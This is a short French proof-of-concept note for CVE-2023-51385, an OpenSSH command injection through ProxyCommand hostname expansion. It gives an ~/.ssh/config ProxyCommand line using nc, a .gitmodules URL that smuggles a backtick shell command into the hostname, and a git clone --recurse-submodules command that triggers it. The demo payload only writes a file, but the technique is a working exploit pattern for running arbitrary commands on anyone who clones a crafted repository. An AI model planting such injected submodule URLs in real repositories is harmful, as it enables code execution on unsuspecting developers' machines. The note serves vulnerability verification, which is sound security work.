
Une vérification de CVE-2023-51385
~/.ssh/configHost *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Il existe une injection de commande dans la déclaration du fichier .gitmodules
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Une fois la configuration terminée, exécutez la commande suivante pour déclencher :
git clone https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules
Si l'exécution réussit, un fichier cve.txt sera généré dans le répertoire CVE-2023-51385_test
![ image-20231225234031349 ] ( https://ltmthink-blogimages.oss-cn-hangzhou.aliyuncs.com/imgs/202312252345762.png )
Plus de détails sur le blog de l'article :